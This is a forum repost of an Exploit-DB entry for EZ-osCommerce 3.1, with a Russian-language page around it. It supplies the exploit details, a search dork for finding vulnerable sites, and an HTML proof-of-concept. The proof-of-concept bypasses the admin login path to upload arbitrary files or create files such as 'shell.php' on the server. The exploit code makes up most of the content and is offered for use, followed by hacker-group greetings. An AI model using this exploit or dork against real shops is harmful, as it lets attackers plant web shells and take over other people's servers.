Exploit EZ-osCommerce 3.1 - Arbitrary File Upload

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
14415
Проверка EDB
  1. Пройдено
Автор
INDOUSHKA
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2010-07-20
HTML:
====================================================
EZ-Oscommerce 3.1 Remote File Upload
====================================================

######################################################################## 
# Vendor: http://www.ezosc.com
# Date: 2010-05-27 
# Author : indoushka 
# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! 
# Contact : [email protected] 
# Home : www.arab-blackhat.co.cc
# Dork :Powered by osCommerce | Customized by EZ-Oscommerce
# Bug  : Remote File Upload 
# Tested on : windows SP2 Fran?ais V.(Pnx2 2.0) 
######################################################################## 
                                                                                                                                                                                                
# Exploit By indoushka 


<html><head><title> EZ-Oscommerce 3.1 - Remote File Upload </title></head> 

<br><br><u>UPLOAD FILE:</u><br> 

<form name="file" action="http://site/admin/file_manager.php/login.php?action=processuploads" method="post" enctype="multipart/form-data"> 

<input type="file" name="file_1"><br> 

<input name="submit" type="submit" value="   Upload   " > 

</form> 

<br><u>CREATE FILE:</u><br> 

<form name="new_file" action="http://site/admin/file_manager.php/login.php?action=save" method="post"> 

FILE NAME:<br> 

<input type="text" name="filename">  (ex. shell.php)<br>FILE CONTENTS:<br> 

<textarea name="file_contents" wrap="soft" cols="70" rows="10">&lt;/textarea&gt; 

<input name="submit" type="submit" value="   Save   " > 

</form> 

Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
all my friend :
His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N
(cr4wl3r Let the poor live ) * RoAd_KiLlEr * AnGeL25dZ * ViRuS_Ra3cH
---------------------------------------------------------------------------------------------------------------------------------
 
Источник
www.exploit-db.com

Похожие темы